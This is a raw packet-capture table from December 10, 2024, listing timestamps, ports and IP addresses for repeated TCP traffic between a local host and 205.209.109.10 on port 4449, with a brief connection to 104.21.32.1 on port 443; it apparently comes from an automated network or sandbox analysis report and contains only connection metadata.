Dec 10, 2024 11:11:25.057241917 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.058640003 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.058783054 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.061768055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.063163042 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.063263893 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.064624071 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.067629099 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.067740917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.070410013 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.072112083 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.072211981 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.074254990 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.076644897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.076773882 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.082391024 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.082451105 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.085711002 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.085859060 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.090462923 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.114128113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.114252090 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.114552975 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.117084980 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.117207050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.121323109 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.121452093 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.126454115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.126529932 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.127479076 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.127479076 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.134581089 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.134697914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.138746977 CET	4449	49871	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.144757032 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.144829988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.146955013 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.147044897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.149136066 CET	49871	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.151446104 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.151485920 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.151539087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.155927896 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.155946970 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.155947924 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.156052113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.158023119 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.160626888 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.160692930 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.161628962 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.164978027 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.165090084 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.167742014 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.169460058 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.169595957 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.176745892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.176841974 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.181103945 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.181210041 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.181222916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.181777954 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.183993101 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.184103966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.189784050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.189841032 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.189882040 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.193797112 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.193973064 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.209486008 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.209798098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.209932089 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.212070942 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.212198973 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.214401960 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.216821909 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.216934919 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.217650890 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.233829021 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.233947992 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.244688034 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.246840000 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.246988058 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.248837948 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.249120951 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.249214888 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.249253035 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.253621101 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.253767014 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.254582882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.270797014 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.270921946 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.273061037 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.273101091 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.273180962 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.273578882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.277544975 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.277690887 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.279495001 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.282059908 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.282181978 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.283162117 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.286624908 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.286916971 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.289493084 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.291022062 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.291147947 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.294677973 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.295536995 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.295643091 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.300497055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.300585032 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.304500103 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.304613113 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.304963112 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.304963112 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.309003115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.309021950 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.309835911 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.313499928 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.313652992 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.322784901 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.328871012 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.328995943 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.329061031 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.331175089 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.331283092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.331357002 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.335628033 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.335788012 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.335838079 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.340166092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.340331078 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.340385914 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.344613075 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.344683886 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.344723940 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.364151955 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.364310980 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.368163109 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.368294954 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.370238066 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.370857000 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.370980978 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.375391960 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.375453949 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.377912045 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.392451048 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.392587900 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.392644882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.394686937 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.394809961 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.394902945 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.399215937 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.399386883 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.401704073 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.403692007 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.403808117 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.404484987 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.408799887 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.408905029 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.409311056 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.414040089 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.414403915 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.416071892 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.420180082 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:25.420217991 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:25.420468092 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:25.425005913 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.425019979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.425538063 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.425733089 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:25.425748110 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:25.426934004 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.427054882 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.428785086 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.431443930 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.431498051 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.433296919 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.435961962 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.436094046 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.436883926 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.442065001 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.442178965 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.444780111 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.448331118 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.448445082 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.449598074 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.450635910 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.450766087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.455199957 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.455241919 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.455521107 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.456589937 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.459696054 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.459758997 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.464095116 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.464174032 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.465281963 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.470966101 CET	4449	49878	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.473925114 CET	49878	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.489763021 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.489775896 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.491260052 CET	4449	49879	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.491883039 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.491990089 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.492880106 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.493251085 CET	49879	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.497225046 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.497400045 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.497978926 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.500876904 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.500978947 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.505930901 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.512008905 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.512182951 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.512377024 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.514231920 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.514337063 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.516554117 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.521038055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.521125078 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.521193981 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.524060965 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.524182081 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.524240017 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.528650045 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.528753042 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.528803110 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.535389900 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.535540104 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.537029982 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.544820070 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.544956923 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.545006037 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.548043966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.548151970 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.548245907 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.552654028 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.552723885 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.555288076 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.556211948 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.556335926 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.556391954 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.564111948 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.564282894 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.564347982 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.568950891 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.569186926 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.569288969 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.574611902 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.574731112 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.576847076 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.577074051 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.584623098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.584702969 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.586873055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.587100029 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.589725971 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.593249083 CET	4449	49878	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.602724075 CET	49882	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.603849888 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.612176895 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.612334967 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.612536907 CET	4449	49879	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.613055944 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.614500046 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.614664078 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.617793083 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.619025946 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.619349957 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.625236988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.625355959 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.629435062 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.631680965 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.631805897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.635881901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.635992050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.640516043 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.640631914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.643513918 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.643654108 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.648144007 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.648269892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.649502039 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.656383038 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.656435966 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.661844015 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.662972927 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.664326906 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.664427996 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.665958881 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.667465925 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.667592049 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.670623064 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.675005913 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.675116062 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.677099943 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.677179098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.678738117 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.683625937 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.683875084 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.687227964 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.688646078 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.688751936 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.689485073 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.709716082 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.709847927 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.711456060 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.711571932 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.711839914 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.715918064 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.716104984 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.720454931 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.720582962 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.721535921 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.721926928 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.721971035 CET	4449	49882	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.722147942 CET	49882	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.722429991 CET	49882	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.732379913 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.732600927 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.736573935 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.737092972 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.737273932 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.737328053 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.748788118 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.748903990 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.749535084 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.751000881 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.751128912 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.752592087 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:25.768822908 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:25.768886089 CET	4449	49856	205.209.109.10	192.168.2.5
